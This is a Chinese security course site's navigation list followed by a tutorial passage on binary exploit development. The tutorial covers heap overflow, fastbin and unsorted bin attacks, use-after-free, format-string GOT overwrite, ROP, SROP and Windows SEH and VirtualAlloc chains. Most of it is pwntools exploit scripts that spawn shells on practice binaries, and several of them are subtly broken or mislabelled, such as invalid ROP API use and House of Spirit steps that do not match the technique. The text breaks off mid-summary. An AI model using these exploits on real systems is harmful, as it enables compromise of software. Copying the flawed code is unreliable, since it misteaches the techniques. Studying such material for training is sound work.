公开文集
0x01 信安之路安全产品
0x01 SRC 资产管理系统
001 企业资产有那些?
002 订阅最新 POC
003 IP 域名关联查询
004 公益权重数据
0x02 安全学习成长平台
001 成长平台视频参考
100 百分成就-学习心得-TOP 21 小伙伴
101 百分成就-学习心得-不想起床
102 百分成就-学习心得-不驚
103 百分成就-学习心得-aiDa0
104 百分成就-学习心得-起十二
105 百分成就-学习心得-Eyes
201 你为什么选择信安之路!
0x03 安全知识库
001 蜜罐运营专辑
0x04 自研蜜罐系统
0x02 Web 漏洞案例库
0x01 配置安全
001 header 安全配置
002 首页信息泄露
003 HTTP 访问控制 (CORS)
0x02 安全控制缺失
001 速率限制绕过
0x03 应用逻辑
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x04 星球讨论知识问答
信息安全入门
学习方向选择
学习经验分享
安全产品研发
代码审计
物联网安全
APT
安全防御建设
安全建设经验
数据泄露监控
网络安全
终端安全
主机安全
产品安全
安全意识
数据安全
内部资产管理
安全管理
应急响应
网络安全架构
安全运营
业务安全
运维安全
渗透测试技术
信息收集
EXP/POC
web 测试
APP测试
内网渗透
0x05 代码审计小挑战
01 前端安全问题
101 script 标签下的 XSS
102 消息事件引发的 DOM XSS
104 常规评论 xss 漏洞
105 页面开放重定向漏洞
106 部分过滤的 xss 漏洞绕过
107 基于 DOM 的 XSS
108 CORS 配置错误
109 退出登录出 XSS
110 URL 重定向漏洞
111 CSRF 漏洞利用
112 JavaScript 代码注入
113 xss 绕过括号和反引号检测
02 文件操作类问题
201 Django 任意文件读取漏洞
202 php 后缀黑名单验证绕过上传
203 jsp 任意文件上传
204 jsp 代码中的 SSRF 漏洞
205 jsp 目录穿越漏洞
206 PHP文件包含漏洞
207 Django 本地文件包含
208 文件包含功能绕过
209 SSRF 跨服务端请求伪造
210 本地文件包含漏洞 windows
211 目录穿越漏洞
212 文件上传绕过
213 php 文件包含漏洞
03 注入类问题
301 由 SQL 注入引发的命令执行
302 php8 XML 实体注入
303 正则问题导致验证绕过
304 XPath 注入
305 典型认证 SQL 注入
306 数字型 SQL 注入
307 主机头(host header)注入
308 LDAP 注入
309 典型的万能密码漏洞
310 Ldap 注入漏洞代码
04 命令执行类问题
401 调用第三方工具时被劫持
402 原型污染导致命令执行
403 php array_map 代码执行
404 命令执行绕过检测
405 SSTI 模板注入
406 文件名注入 RCE
407 无防护命令执行
408 python eval 注入
409 绕过多个黑名单命令
05 业务逻辑类问题
501 django 认证 jwt 未验证 token
502 绕过权限检测执行命令
503 密码找回邮箱地址大小写绕过
504 DNS 重绑定问题
505 权限比对逻辑问题
506 越权访问其他用户的记录
507 用户注册问题
508 用户权限验证逻辑问题
509 PHP 判断两个变量相等逻辑问题
06 反序列化类问题
601 php 反序列化漏洞
602 python 反序列化漏洞
09 C语言问题
901 c 条件竞争
902 缓冲区溢出
903 通配符注入提权
0x99 AI 教你学安全
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
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Day-235-漏洞利用开发深入
# Day 261: 漏洞利用开发深入 - 堆溢出/UAF/格式化字符串/ROP > 渗透测试系列第 51 天 | 预计阅读时间:50 分钟 | 难度:★★★★★ --- ## 清单 目录 1. [漏洞利用开发基础](#漏洞利用开发基础) 2. [堆溢出漏洞利用](#堆溢出漏洞利用) 3. [UAF 漏洞利用](#uaf-漏洞利用) 4. [格式化字符串漏洞](#格式化字符串漏洞) 5. [ROP 链构造进阶](#rop-链构造进阶) 6. [Linux 漏洞利用](#linux-漏洞利用) 7. [Windows 漏洞利用](#windows-漏洞利用) 8. [总结与思考](#总结与思考) 9. [参考资料](#参考资料) --- ## 漏洞利用开发基础 ### 前置知识 **必要技能**: ``` 汇编语言: - x86/x64 汇编 - ARM 汇编 (移动设备) - 寄存器理解 - 栈帧结构 C/C++ 编程: - 内存管理 - 指针操作 - 结构体对齐 - 编译器优化 操作系统: - 进程内存布局 - 系统调用 - 动态链接 - 线程机制 ``` **调试工具**: ``` Linux: - GDB + pwndbg/gef/peda - radare2 - lldb Windows: - WinDbg - x64dbg - IDA Pro 通用: - Binary Ninja - Ghidra (开源) ``` ### 内存保护机制 **保护机制**: ``` DEP/NX (数据执行保护): - 标记内存页为不可执行 - 防止栈/堆上执行代码 - 绕过:ROP、Ret2LibC ASLR (地址空间随机化): - 随机化内存地址 - 增加利用难度 - 绕过:信息泄露、部分覆盖 Canary (栈保护): - 栈帧前插入随机值 - 函数返回前检查 - 绕过:泄露、异常处理 PIE (位置无关可执行文件): - 基址随机化 - 增加 ROP 难度 - 绕过:相对地址、泄露 ``` **检查工具**: ```bash # checksec 检查 checksec --file=./binary # 输出示例: RELRO STACK CANARY NX PIE RPATH RUNPATH Partial RELRO Found Enabled Enabled None None ``` --- ## 堆溢出漏洞利用 ### 堆内存管理 **glibc malloc 实现**: ``` Chunk 结构: +------------------+ | prev_size (8B) | 前一个 chunk 大小 +------------------+ | size (8B) | 当前 chunk 大小 +------------------+ | fd (8B) | 前向指针 (free chunk) +------------------+ | bk (8B) | 后向指针 (free chunk) +------------------+ | user data | 用户数据 +------------------+ Chunk 状态: - allocated: 已分配 - free: 空闲 - mmap: 内存映射 ``` **Bin 结构**: ``` Fastbins (快速分配箱): - 小 chunk (16-128 字节) - LIFO (后进先出) - 不合并相邻 free chunk Smallbins: - 小 chunk (128-512 字节) - FIFO - 合并相邻 free chunk Largebins: - 大 chunk (>512 字节) - 按大小分类 Unsortedbin: - 临时存放 - 下次分配时分类 ``` ### 堆溢出攻击 **基础堆溢出**: ```python from pwn import * p = process('./heap_vuln') # 分配 chunk A (0x100 字节) p.sendlineafter('>', '1') p.sendlineafter('Index:', '0') p.sendlineafter('Size:', '0x100') p.sendlineafter('Data:', 'A' * 0x100) # 分配 chunk B (0x100 字节) p.sendlineafter('>', '1') p.sendlineafter('Index:', '1') p.sendlineafter('Size:', '0x100') p.sendlineafter('Data:', 'B' * 0x100) # 堆溢出:chunk A 溢出覆盖 chunk B p.sendlineafter('>', '2') # edit p.sendlineafter('Index:', '0') p.sendlineafter('Data:', 'C' * 0x110) # overflow! p.interactive() ``` **Fastbin Attack**: ```python from pwn import * p = process('./fastbin_vuln') # 分配 3 个 fastbin chunk p.sendlineafter('>', '1') # malloc p.sendlineafter('Size:', '0x20') p.sendlineafter('Index:', '0') p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x20') p.sendlineafter('Index:', '1') p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x20') p.sendlineafter('Index:', '2') # 释放 chunk 0 和 1 p.sendlineafter('>', '2') # free p.sendlineafter('Index:', '0') p.sendlineafter('>', '2') p.sendlineafter('Index:', '1') # Fastbin dup: 伪造 fd 指向目标地址 fake_chunk = p64(0) + p64(0x21) + p64(0) + p64(target_addr) p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x20') p.sendlineafter('Index:', '3') p.sendlineafter('Data:', fake_chunk) # 再次分配,获取 target_addr 控制权 p.sendlineafter('>', '2') p.sendlineafter('Index:', '1') p.sendlineafter('>', '2') p.sendlineafter('Index:', '3') p.interactive() ``` **Unsorted Bin Attack**: ```python from pwn import * p = process('./unsortedbin_vuln') # 分配 large chunk p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x428') p.sendlineafter('Index:', '0') # 分配到 libc 地址附近的 chunk p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x28') p.sendlineafter('Index:', '1') # 释放 large chunk 到 unsorted bin p.sendlineafter('>', '2') p.sendlineafter('Index:', '0') # 溢出覆盖 unsorted bin chunk 的 bk payload = 'A' * 0x428 + p64(0) + p64(0x431) + p64(0) + p64(target_addr - 0x10) p.sendlineafter('>', '3') # edit p.sendlineafter('Index:', '1') p.sendlineafter('Data:', payload) # 再次分配,触发 unlink p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x428') p.sendlineafter('Index:', '2') p.interactive() ``` --- ## UAF 漏洞利用 ### UAF 原理 **漏洞形成**: ```c // 漏洞代码示例 struct User { char name[32]; void (*greet)(); }; struct User *user = malloc(sizeof(struct User)); user->greet = hello; free(user); // 释放但未置空 // 后续使用已释放的指针 user->greet(); // UAF! 攻击者可控制 user->greet ``` **利用条件**: ``` 1. 对象释放后未置空 2. 存在后续使用 3. 攻击者可重新分配相同大小内存 4. 可控制重新分配的内容 ``` ### UAF 攻击技术 **基础 UAF**: ```python from pwn import * p = process('./uaf_vuln') # 创建对象 p.sendlineafter('>', '1') # create p.sendlineafter('Index:', '0') p.sendlineafter('Name:', 'victim') # 删除对象 (释放内存) p.sendlineafter('>', '2') # delete p.sendlineafter('Index:', '0') # 重新分配相同大小内存 (攻击者控制) p.sendlineafter('>', '1') p.sendlineafter('Index:', '1') p.sendlineafter('Name:', 'A' * 32 + p64(shell_addr)) # 触发 UAF (使用已释放对象) p.sendlineafter('>', '3') # use p.sendlineafter('Index:', '0') # 此时 user->greet 已被攻击者控制 p.interactive() ``` **House of Spirit**: ```python from pwn import * p = process('./house_of_spirit') # 分配 fake chunk 大小的内存 p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x80') p.sendlineafter('Index:', '0') # 释放 p.sendlineafter('>', '2') p.sendlineafter('Index:', '0') # 在 fake chunk 位置分配 fake_chunk_addr = 0x602000 payload = p64(0) + p64(0x91) # fake chunk header p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x80') p.sendlineafter('Index:', '1') p.sendlineafter('Data:', payload) # malloc 会返回 fake chunk p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x80') p.sendlineafter('Index:', '2') # 现在可以写入 fake chunk 位置 p.interactive() ``` **House of Force**: ```python from pwn import * p = process('./house_of_force') # 破坏 top chunk size p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x100') p.sendlineafter('Index:', '0') p.sendlineafter('Data:', 'A' * 0x100 + p64(-1)) # 破坏 top chunk # 分配大 chunk (触发 malloc 检查绕过) p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x10000000000000000') p.sendlineafter('Index:', '1') # 分配到目标地址 p.sendlineafter('>', '1') p.sendlineafter('Size:', '0x100') p.sendlineafter('Index:', '2') # 现在可以写入任意地址 p.interactive() ``` --- ## 格式化字符串漏洞 ### 漏洞原理 **漏洞代码**: ```c // 漏洞代码 char buf[100]; fgets(buf, sizeof(buf), stdin); printf(buf); // 漏洞!应该是 printf("%s", buf) // 攻击者输入:%x %x %x %x // 输出:栈上内存内容 ``` **利用方式**: ``` 信息泄露: - %x / %p: 读取栈内存 - %s: 读取字符串 - 泄露 canary、libc 地址、GOT 任意写入: - %n: 写入已打印字节数 - %hn: 写入半字 (2 字节) - %hhn: 写入字节 (1 字节) ``` ### 格式化字符串攻击 **信息泄露**: ```python from pwn import * p = process('./fmt_vuln') # 泄露 canary p.sendline('%39$p') # canary 在第 39 个参数 canary = int(p.recvline().strip(), 16) print(f'Canary: {hex(canary)}') # 泄露 libc 地址 p.sendline('%35$p') # libc 地址在第 35 个参数 libc_addr = int(p.recvline().strip(), 16) libc_base = libc_addr - libc.symbols['puts'] print(f'Libc base: {hex(libc_base)}') # 使用泄露的地址构造 ROP ``` **任意写入**: ```python from pwn import * p = process('./fmt_vuln') elf = ELF('./fmt_vuln') # 目标:覆盖 printf@got 为 system 地址 printf_got = elf.got['printf'] system_addr = libc.symbols['system'] # 构造 payload # %n 写入已打印的字节数到参数指向的地址 # 分两次写入 (2 字节 + 2 字节) low = system_addr & 0xffff high = (system_addr >> 16) & 0xffff payload = '' payload += '%{}c'.format(low - len(payload)) # 打印到 low payload += '%7$hn' # 写入到第 7 个参数 (printf_got) payload += '%{}c'.format(high - low) # 打印到 high payload += '%8$hn' # 写入到第 8 个参数 (printf_got + 2) # 填充参数 payload = payload.ljust(32, 'A') payload += p64(printf_got) # 第 7 个参数 payload += p64(printf_got + 2) # 第 8 个参数 p.sendline(payload) # 现在 printf 变成了 system p.sendline('/bin/sh') p.interactive() ``` **自动化利用**: ```python from pwn import * def fmt_exploit(target_addr, write_value): """ 自动化格式化字符串利用 """ payload = '' # 分 4 次写入 (每字节) for i in range(4): byte_val = (write_value >> (i * 8)) & 0xff current_len = len(payload) # 计算需要打印的字符数 padding = (byte_val - current_len) % 256 if padding > 0: payload += '%{}c'.format(padding) # 写入字节 payload += '%{}$hhn'.format(7 + i) # 填充参数 payload = payload.ljust(32, 'A') for i in range(4): payload += p64(target_addr + i) return payload # 使用示例 payload = fmt_exploit(printf_got, system_addr) p.sendline(payload) ``` --- ## ROP 链构造进阶 ### Gadget 查找 **查找工具**: ```bash # ROPgadget ROPgadget --binary ./vuln --only "pop|ret" ROPgadget --binary ./vuln --string "/bin/sh" # ropper ropper --file ./vuln --search "pop rdi; ret" ropper --file ./vuln --search "pop rsi; pop r15; ret" # one_gadget (libc) one_gadget libc.so.6 ``` **Gadget 类型**: ``` 寄存器加载: - pop rdi; ret - pop rsi; ret - pop rdx; ret - pop rax; ret 函数调用: - call rax - call [rdi] - jmp rax 算术运算: - add rax, rbx; ret - sub rax, 1; ret - xor rax, rax; ret 内存操作: - mov [rdi], rax; ret - mov rax, [rdi]; ret ``` ### ROP 链构造 **基础 ROP**: ```python from pwn import * binary = ELF('./vuln') libc = ELF('./libc.so.6') # 查找 gadget pop_rdi = binary.search(asm('pop rdi; ret')).__next__() pop_rsi = binary.search(asm('pop rsi; ret')).__next__() ret = binary.search(asm('ret')).__next__() # 栈对齐 # 构造 ROP 链 rop = ROP(binary) rop.rdi = binary.got['puts'] # 第一个参数:puts@got rop.call(binary.plt['puts']) # 调用 puts rop.main() # 返回 main 循环 # 生成 payload payload = flat([ b'A' * offset, rop.chain() ]) # 发送 payload p.sendline(payload) # 接收泄露 puts_addr = u64(p.recvline().strip().ljust(8, b'\x00')) libc_base = puts_addr - libc.symbols['puts'] # 第二次 ROP:获取 shell system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) rop = ROP(binary) rop.rdi = binsh_addr rop.call(system_addr) payload = flat([ b'A' * offset, rop.chain() ]) p.sendline(payload) p.interactive() ``` **复杂 ROP 链**: ```python from pwn import * binary = ELF('./vuln') libc = ELF('./libc.so.6') # 构造复杂 ROP 链 rop = ROP([binary, libc]) # 1. 泄露 libc 地址 rop.find_gadget(['pop rdi', 'ret'])[0] = binary.got['puts'] rop.puts() rop.main() # 发送第一次 payload p.sendline(fit({offset: rop.chain()})) p.recvline() # 计算 libc 基址 puts_addr = u64(p.recvline().strip().ljust(8, b'\x00')) libc.address = puts_addr - libc.symbols['puts'] # 2. 获取 shell rop = ROP([binary, libc]) rop.find_gadget(['pop rdi', 'ret'])[0] = next(libc.search(b'/bin/sh')) rop.system() # 发送第二次 payload p.sendline(fit({offset: rop.chain()})) p.interactive() ``` **SROP (Sigreturn Oriented Programming)**: ```python from pwn import * binary = ELF('./vuln') # 构造 sigreturn frame frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = next(binary.search(b'/bin/sh')) frame.rsi = 0 frame.rdx = 0 frame.rsp = binary.bss() frame.rip = binary.plt['syscall'] # 构造 payload payload = flat([ b'A' * offset, frame ]) # 触发 sigreturn p.sendline(payload) p.interactive() ``` --- ## Linux 漏洞利用 ### Linux 保护机制 **保护机制**: ``` RELRO (重定位只读): - Partial RELRO: GOT 部分可写 - Full RELRO: GOT 完全只读 - 影响:GOT 覆盖是否可行 PIE (位置无关执行文件): - 基址随机化 - 需要相对地址或泄露 Stack Canary: - 栈保护 - 需要泄露或绕过 NX (不可执行): - 栈/堆不可执行 - 需要 ROP ``` ### Linux 利用技术 **Ret2LibC**: ```python from pwn import * binary = ELF('./vuln') libc = ELF('./libc.so.6') # 查找 system 和 /bin/sh system_addr = libc.symbols['system'] binsh_addr = next(libc.search(b'/bin/sh')) # 构造 ROP 链 rop = ROP(binary) pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] payload = flat([ b'A' * offset, pop_rdi, binsh_addr, system_addr ]) p.sendline(payload) p.interactive() ``` **GOT 覆盖**: ```python from pwn import * binary = ELF('./vuln') libc = ELF('./libc.so.6') # 检查 RELRO if binary.relro == 'Full': print('Full RELRO, cannot overwrite GOT') exit() # 构造格式化字符串 payload printf_got = binary.got['printf'] system_addr = libc.symbols['system'] payload = fmt_exploit(printf_got, system_addr) p.sendline(payload) # 触发 system p.sendline('/bin/sh') p.interactive() ``` **Orw (Open-Read-Write)**: ```python from pwn import * binary = ELF('./vuln') # 构造 orw ROP 链 rop = ROP(binary) # open("/flag", 0, 0) rop.rdi = binary.search(b'/flag').__next__() rop.rsi = 0 rop.rdx = 0 rop.rax = 2 # SYS_open rop.syscall() # read(fd, buf, 0x100) rop.rdi = 3 # fd from open rop.rsi = binary.bss() rop.rdx = 0x100 rop.rax = 0 # SYS_read rop.syscall() # write(1, buf, 0x100) rop.rdi = 1 # stdout rop.rsi = binary.bss() rop.rdx = 0x100 rop.rax = 1 # SYS_write rop.syscall() payload = flat([ b'A' * offset, rop.chain() ]) p.sendline(payload) p.interactive() ``` --- ## Windows 漏洞利用 ### Windows 保护机制 **保护机制**: ``` DEP (数据执行保护): - 类似 Linux NX - 需要 ROP ASLR (地址空间随机化): - 模块基址随机化 - 需要泄露或绕过 SEH (结构化异常处理): - 异常处理链 - 可被利用 (DEP 之前) CFG (控制流保护): - 验证间接调用 - 增加 ROP 难度 ``` ### Windows 利用技术 **SEH 覆盖**: ```python from pwn import * # Windows XP/2003 技术 (现代系统已防护) # 构造 SEH payload payload = b'A' * offset payload += p32(next_seh) # next SEH record payload += p32(pop_pop_ret) # SEH handler payload += nop_sled payload += shellcode p.sendline(payload) p.interactive() ``` **ROP 利用**: ```python from pwn import * binary = PE('./vuln.exe') # 查找 ROP gadget pop_rdx = binary.search(asm('pop rdx; ret')).__next__() pop_rcx = binary.search(asm('pop rcx; ret')).__next__() # VirtualAlloc ROP 链 rop = ROP(binary) rop.rdx = 0x40 # PAGE_EXECUTE_READWRITE rop.rcx = binary.bss() rop.r8 = 0x1000 rop.r9 = 0x40 rop.call(binary.plt['VirtualAlloc']) # 复制 shellcode rop.memcpy(binary.bss(), shellcode_addr, len(shellcode)) # 执行 shellcode rop.call(binary.bss()) payload = flat([ b'A' * offset, rop.chain() ]) p.send(payload) p.interactive() ``` --- ## 总结与思考 ### 核心要点回顾 1. 